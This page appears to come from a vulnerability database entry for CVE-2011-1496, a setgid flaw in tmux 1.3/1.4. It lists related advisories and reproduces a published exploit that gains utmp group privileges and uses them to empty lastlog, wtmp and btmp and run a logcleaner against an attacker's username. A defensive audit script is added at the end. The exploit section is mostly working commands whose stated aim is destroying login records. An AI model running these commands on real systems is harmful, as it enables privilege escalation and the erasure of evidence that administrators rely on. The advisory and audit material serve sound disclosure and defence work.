tmux 1.3/1.4 has a privilege escalation flaw allowing log file deletion without root access.
Reporter | Title | Published | Views | Family |
---|---|---|---|---|
CVE | CVE-2011-1496 | 18 Apr 2011 18:55 | – | cve |
NVD | CVE-2011-1496 | 18 Apr 2011 18:55 | – | nvd |
securityvulns | [SECURITY] [DSA 2212-1] tmux security update | 11 Apr 2011 00:00 | – | securityvulns |
OpenVAS | Fedora Update for tmux FEDORA-2011-5167 | 21 Apr 2011 00:00 | – | openvas |
OpenVAS | Fedora Update for tmux FEDORA-2011-5156 | 21 Apr 2011 00:00 | – | openvas |
OpenVAS | Fedora Update for tmux FEDORA-2011-5156 | 21 Apr 2011 00:00 | – | openvas |
OpenVAS | Debian Security Advisory DSA 2212-1 (tmux) | 12 May 2011 00:00 | – | openvas |
OpenVAS | Debian: Security Advisory (DSA-2212-1) | 12 May 2011 00:00 | – | openvas |
OpenVAS | Fedora Update for tmux FEDORA-2011-5167 | 21 Apr 2011 00:00 | – | openvas |
Tenable Nessus | Fedora 13 : tmux-1.4-3.fc13 (2011-5156) | 19 Apr 2011 00:00 | – | nessus |
---------------------------------------
| Team ph0x90bic proudly presents |
| tmux -S 1.3/1.4 local utmp exploit |
---------------------------------------
# Exploit Title: tmux '-S' Option Incorrect SetGID Local Privilege Escalation Vulnerability
# Date: 11.04.2011
# Author: ph0x90bic
# Software Link: http://tmux.sourceforge.net/
# Version: 1.3/1.4
# Tested on: Linux debian 2.6.26-1-686
# CVE : CVE-2011-1496
---
INTRODUCTION
tmux 1.3/1.4 contains a privilege escalation vulnerability,
which gives you utmp group privileges. This bug is important,
because it is possible to clean logfiles and use logcleaners
for btmp, wtmp and lastlog without local root access.
---
EXPLOIT
Execute shell as utmp group
$ tmux -S /tmp/.whateveryouwant -c id
uid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company)
$ tmux -S /tmp/.whateveryouwant -c /bin/sh
$ id
uid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company)
--
Delete logfiles
$ tmux -S /tmp/.whateveryouwant -c '> /var/log/lastlog'
$ tmux -S /tmp/.whateveryouwant -c '> /var/log/wtmp'
$ tmux -S /tmp/.whateveryouwant -c '> /var/log/btmp'
--
Use logcleaner software
$ tmux -S /tmp/.whateveryouwant -c /tmp/thcclear13/cleara hacker-username
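
A defensive check for the condition this advisory describes, added here as an example and not part of the original posting: it flags a tmux binary that is setgid `utmp` at one of the affected versions, and lists login-accounting files that are empty. The function names are hypothetical, GNU `stat` is assumed, and `tmux -V` is assumed to print `tmux <version>`.

```shell
#!/bin/sh
# Added example, not part of the advisory: host audit for the setgid-utmp
# tmux condition and for emptied login-accounting files.

# mode_has_setgid OCTAL_MODE -> exit 0 if the setgid bit (02000) is set
mode_has_setgid() {
    [ $(( 0$1 & 02000 )) -ne 0 ]
}

# affected_version "tmux X.Y" -> exit 0 for the versions the advisory names
affected_version() {
    case "$1" in
        "tmux 1.3"|"tmux 1.4") return 0 ;;
        *) return 1 ;;
    esac
}

# classify MODE GROUP VERSION -> prints REVIEW or OK
classify() {
    if mode_has_setgid "$1" && [ "$2" = "utmp" ] && affected_version "$3"; then
        echo REVIEW
    else
        echo OK
    fi
}

# audit_tmux [PATH] -> classify the installed binary (GNU stat assumed)
audit_tmux() {
    bin=${1:-$(command -v tmux)} || return 2
    info=$(stat -c '%a %G' "$bin" 2>/dev/null) || return 2
    # info looks like "2755 utmp": octal mode, then owning group
    classify "${info% *}" "${info#* }" "$("$bin" -V 2>/dev/null)"
}

# empty_accounting_logs DIR -> prints names of zero-length wtmp/btmp/lastlog
empty_accounting_logs() {
    for f in wtmp btmp lastlog; do
        if [ -f "$1/$f" ] && [ ! -s "$1/$f" ]; then
            echo "$f"
        fi
    done
}
```

Run `audit_tmux` and `empty_accounting_logs /var/log` on the host. A distribution may ship a fixed build under the same upstream version, so REVIEW means checking the package against the advisories listed above, and an empty `wtmp` or `btmp` is also what log rotation leaves behind.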